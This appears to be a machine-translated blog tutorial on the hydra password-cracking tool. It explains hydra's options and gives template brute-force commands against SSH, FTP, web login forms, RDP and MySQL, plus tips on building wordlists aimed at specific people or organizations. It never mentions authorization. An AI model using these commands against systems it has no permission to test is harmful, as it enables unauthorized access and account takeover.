cool hit counter Efficient hacking of service and protocol ports with hydra_Intefrankly

Efficient hacking of service and protocol ports with hydra

The hydra is the hydra Hydra in Greek mythology, but you have no problem thinking of it as the hydra in the Chinese Shanhaijing or Journey to the West.

So named from the ability to blast numerous service or protocol ports, the hydra tool is developed and open-sourced by the hacker group THC.

I am using kali linux as my computer operating system

The hydra is a tool that comes with the system, so skip the installation (clone one off github if you don't have one) and get straight to the point. Open a terminal and type hydra,the first paragraph looks like this.

Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

To get really familiar with a tool, you must be familiar with its help file, and as you can clearly see from the first paragraph of the screenshot below, the ports it can hack are very rich beyond imagination.

Check out the help file further for more details on the instructions

-l Specify the user name

-L Specify the username dictionary

-p Specify the password

-P Specify the password dictionary

-C Replaces -L/-P, e.g. admin.txt:password.txt

-q connection errors are not shown, because some ip's may not be successfully connected

-o Output results documentation

-t Running threads, default value is 16

-T Run tasks in parallel, default value is 64, provided that -m is used, as the tasks are too large

-v Detailed mode

-V Display the attempted account password for each hack

-e n Use an empty password, e.g. admin corresponds to an empty password

-e s The same username and password, e.g. admin corresponds to admin

-e ns combination

-m Specify the target document, limit 1 entry per line, because it is not messy

-f Stop after one successful crack, provided that -m is used

-R Continue cracking according to the last progress, provided that -f is used, which can be used jointly

-s Specify the service port, as some ports are not default

-S Connecting using the ssl protocol.

-w Set the maximum timeout, the default is 30 seconds, because some ip connections wait too long

service Specifies a service or protocol

server Specify the ip, which can correspond to the c segment

The common commands have basically been figured out, and the help documentation gives a few simple reference examples. However, we need to understand that a tool that knows how to customize it to maximize its use.

1 - Hack ssh, default port 22, username is usually root

hydra -L username dictionary -P password dictionary -t thread -e ns ip ssh -vV -o jieguo.txt

2 - Hack ftp, default port 21, default username of anonymous server is anonymous

hydra -L username dictionary -P password dictionary -t thread -e ns ip ftp -vV -o jieguo.txt

3 - Hacking the web, obviously the links section here needs to be constructed differently for different situations


hydra -L username dictionary -P password dictionary -t thread -e ns -s 8080 ip http-get/admin/index.php -vV -o jieguo.txt

postSubmitted by.

hydra -L User Name Dictionary -P cryptographic dictionary -t threads -e ns -s 8080 iphttp-post-form"/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorrypassword"-vV -o jieguo.txt

4 - Hack rdp, default port 3389, username is usually administrator or root

hydra -L username dictionary -P password dictionary -t thread -e ns ip rdp -vV -o jieguo.txt

5 - Hack mysql, default port 3306, username is usually root

hydra -L username dictionary -P password dictionary -t thread -e ns ip mysql -vV -o jieguo.txt

The above 5 are common port bursts, for other services or protocols, can be customized, much the same, will not be Baidu. Of course, if the dictionary is too large, the blast time will be very long, and the number of individual ip blasts, equal to the username dictionary multiplied by the password dictionary.

The effectiveness of blasting is closely related to the size and quality of the dictionary, cryptographic dictionaries can be found on github to get a lot of them, but when it comes to quality, you need to customize them yourself.

There are two ways to go here, first, sift through the dictionary yourself to find those usernames and passwords that are most commonly used, aiming for small and precise initial blasts to the server. If that fails, you can either give up or go to the next step and personalize the dictionary (for a specific individual or organization) with the tools crunch, cupp, cewl, etc. that can be utilized, as to how to use them will be mentioned later. Only then can relatively efficient password blasting be achieved, saving time.

Of course, the fact that hydra is used by many people shows its usability and ease of use, is there a tool of its type, of course! medusa and ncrack, for which the utilization of these two tools will be mentioned subsequently.

2、Hand Tearing Deep Learning Algorithms 6 Hand Tearing LSTM Lessons 3 and 4
3、HTC which wants to take the lead in building the VR ecosystem has a chance to win
4、Healthcare has become the number one industry for AI funding
5、Jenkins configuration information change history

    已推荐到看一看 和朋友分享想法
    最多200字,当前共 发送